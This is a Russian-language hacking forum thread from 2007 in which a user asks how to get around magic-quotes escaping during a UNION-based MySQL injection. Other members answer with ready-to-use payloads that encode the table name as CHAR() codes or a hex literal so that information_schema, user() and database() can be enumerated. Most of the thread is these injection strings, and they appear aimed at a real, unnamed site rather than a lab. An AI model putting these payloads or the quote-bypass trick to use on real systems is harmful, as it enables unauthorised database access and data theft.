Обход кавычки в mysql-inj?

Discussion in 'Уязвимости' started by orcismylife, 20 Nov 2007.

Thread Status:
Not open for further replies.
  1. orcismylife

    orcismylife Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    22
    Likes Received:
    6
    Reputations:
    0
    Версия
    5.0.22-log

    Нужно обойти кавычку...

    =====
    При построении запроса:

    +union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name='USER_PRIVILEGES'+limit+1,1/*

    =====
    Мускул выдает, что:

    <...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

    Мэджик квотес судя по всему включены... Обойти как-то можно?

    ЗЫ. Пробовал перевести в хекс - не получилось.
     
    1 person likes this.
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Что значит не получилось в хекс перевести?
     
  3. orcismylife

    orcismylife Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    22
    Likes Received:
    6
    Reputations:
    0
    переверсти в хекс получилось, результат запроса не изменился
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Надеюсь ты ковычки тоже в хекс не переводил...
     
    _________________________
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вот тебе два варианта:
    +union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name=CHAR(85,83,69,82,95,80,82,73,86,73,76,69,71,69,83)+limit+1,1/*

    +union+select+1,column_name,3,4,5,6,7,8,user(),10,database(),12,13+from+information_schema.columns+where+table_name=0x555345525F50524956494C45474553+limit+1,1/*
     
  6. orcismylife

    orcismylife Elder - Старейшина

    Joined:
    1 Oct 2007
    Messages:
    22
    Likes Received:
    6
    Reputations:
    0
    йа дибилко. забыл про char().. всем огромное спасибо.
     
    2 people like this.
Thread Status:
Not open for further replies.